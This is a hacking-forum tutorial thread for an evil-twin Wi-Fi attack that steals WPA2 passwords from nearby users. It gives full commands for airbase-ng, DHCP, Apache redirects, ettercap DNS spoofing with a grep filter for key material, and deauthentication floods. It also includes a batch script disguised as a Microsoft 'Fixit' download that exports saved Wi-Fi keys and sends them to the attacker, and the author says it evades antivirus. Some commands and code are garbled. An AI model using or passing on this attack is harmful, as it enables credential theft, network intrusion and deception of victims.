Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[TUT] WPA2 -- Ultimate Fake AP
This is my new spin on an old idea. This will show you how to get WPA2 passwords using a Fake AP without having to ask the user for them. Users will not have to enter a password into a webpage.

I will show how to set up the Fake AP but that is not my main goal. I will cover stuff many of you already know, but stay kind to the noobs. Hopefully everyone will take something from this. The secret sauce of this tutorial is what happens after the client connects to your Fake AP. Are you ready?

Ultimate Fake AP


We will be using:
  • Backtrack 5r3
  • airbase-ng
  • dhcpd3-server
  • apache2
  • ettercap
  • nano (or another text editor)
  • grep

Step 1: Airbase-ng
A. Get into backtrack and start monitor mode on your device. Be sure to specify the channel of your target -- (11 in this example).
airmon-ng start wlan0 11
airodump-ng --channel 11 mon0

B. Now that you have monitor mode I will assume mon0 is your monitor interface name. Start airbase-ng. This cannot be encrypted. DO-NOT change the aa.aa..etc to the MAC address of your target access point, but DO write down the target AP MAC and target client MAC for step 7 later -- (these are found with airodump-ng which is beyond the scope of this tutorial. DO change the --essid to the SSID of your target. Do change your -c (channel) to match their channel. Discussion about this is welcome.
airbase-ng -a aa:aa:aa:aa:aa:aa --essid MYaccessPoint -c 11 mon0

C. Bring up the airbase-ng at0 interface.
ifconfig at0 up

D. Give at0 this specific IP address.
ifconfig at0

Step 2: Configure and Start dhcp3

**UPDATE[spoiler=How to install DHCP3 on BT5r3 -->]

apt-get synaptic

search for dhcp3-common
select it
Go to packages at top menu bar
Force version
Force version

search dhcp3-server
right click and mark for installation

search dhcp3-client
right click and mark for installation

search python-wicd
right click and mark for REMOVAL

search for wicd
right click and mark for installation


A. Edit the dhcpd.conf file so your dhcpd3 server can hand out IP addresses to connecting clients.
nano /etc/dhcp3/dhcpd.conf

B. Once the dhcpd.conf file is open, erase everything in it. Then put this in.
option domain-name-servers;
default-lease-time 600;
max-lease-time 7200;

subnet netmask {
  option routers;

[Image: NyEmDW0.jpg]

C. Create a symbolic link to overcome a common problem with dhcpd3 -- "Can't create PID file /var/run/"
ln -s /var/run/dhcp3-server/ /var/run/

D. Start the dhcpd3 server on the at0 interface using the config file you edited above
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

Step 3: Configure apache2 webserver
A. Edit a config file to configure rewrite functionality. This will redirect almost any URL including sub directories back to our Fake AP page.
nano /etc/apache2/sites-enabled/000-default

B. Once the 000-default file is open make this section look like this. Take note we are adding a directory called /Fixit as an exception. It is case sensitive. We will add this directory in part 2. Don't type add! Rolleyes
        <Directory /var/www/>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride None
        Order allow,deny
        allow from all
   Add-->  RewriteCond  %{REQUEST_URI}  !^/Fixit
   Add-->    RewriteEngine On
   Add-->    RewriteRule ^.*$ /Fixit/

[Image: 1pup8U0.jpg]

C. Start the rewrite mod.
a2enmod rewrite

D. You must restart apache2 to update the config.
/etc/init.d/apache2 restart

Step 4: Ettercap
A. Edit etter.dns config file to send all client web traffic to our apache2 webserver.
nano /usr/local/share/ettercap/etter.dns

B. Once the etter.dns file is open erase everything and put this in.
* A

[Image: 9oWSOwn.jpg]

C. Start ettercap in DNS spoof mode and pipe it through grep. The regex will parse our incoming secret sauce for up to 20 character SSID/names, AP authentication type, and 8-64 character wlan keys.
ettercap -T -i at0 -P dns_spoof | grep -E -o "<name>.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?</name>"\|"<keyMaterial>..?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?</keyMaterial>"\|"<authentication>.?.?.?.?.?.?.?.?.?.?.?</authentication>"

Take a break


Step 5: Wrapping UP
A. Make a direcotry called "Fixit" in /var/www/ it is case sensitive!
mkdir /var/www/Fixit

Step 6: Secret Sauce Part 1

The Fixit directory will contain your html and files for apache2. In my video I use a custom edited microsoft "Fixit" page. I removed all java, and changed a download link and some text. The html and image files for the page are in Secret Sauce Part 2 for download. My index.html download link points to my custom file "bla.bat". Bla.bat is not overly complicated but it is my work. This will not trip antivirus or be affected by any firewall. If the web browser works this will work. If you share this simple code, don't forget where it came from. :blackhat:
PHP Code:
@echo off
cd c
netsh wlan export profile
netsh wlan export profile key

setlocal enableextensions enabledelayedexpansion
/a counter=0
set filecontent
for %%
b in (*.xml) do (
set /a counter=!counter! + 1
echo %%b
for /"delims=" %%a in ('type "C:\%%b"') do (
set filecontent=!filecontent!%%a
@rem enable for debug echo !currentline!
rem enable for debug echo .


echo --
echo !
counterNetwork Profiles Found
echo --
echo !

rem The next line is platform specific.  Sometimes in a diff folder
"c:\Program Files\Internet Explorer\iexplore.exe""%filecontent%" 

Here you can see the index.html file with the download address:

[Image: YKgXn1E.jpg]

Step 6: Secret Sauce Part 2

Here is a zipped Fixit folder made by yours truly It has everything so you don't have to do anything but copy it to your /var/www/ and anyone who connects to your fake AP will be like "damn what a fine page". There is no virus but don't take my word for it. This is what's included:

[Image: neixTKE.jpg]

[Image: 7PwADm3.jpg]

Step 7: Last Step -- Making the Clients Connect
A. Get your target MAC addresses ready as directed in step 1B. We will use the MACs to deauthenticate the users from their actuall access points -- so that they will connect to ours. There are other ways to do this, but it is beyond the scope yada yada yada.
aireplay-ng --deauth 5000 -c TARGETCLIENTMAC -a TARGETAPMAC mon0

B. Start the above command when it stops. The 5000 means send 5000 deauthentication packets. If 5000 is enough to make them connect to our Fake AP then you can stop the command. If they do not connect, just keep hammering them until they do.


August 2013

For those of you who have trouble setting up this attack, Yacked2 has generously provided a video showing the setup as detailed above. Thanks Yacked2.
Sweet tutorial Acroz! Very detailed, going to bookmark this one Smile

Best regards,
Knowledge talks, wisdom listens.
PM me with any questions or comments

Forum Jump:

Users browsing this thread: 1 Guest(s)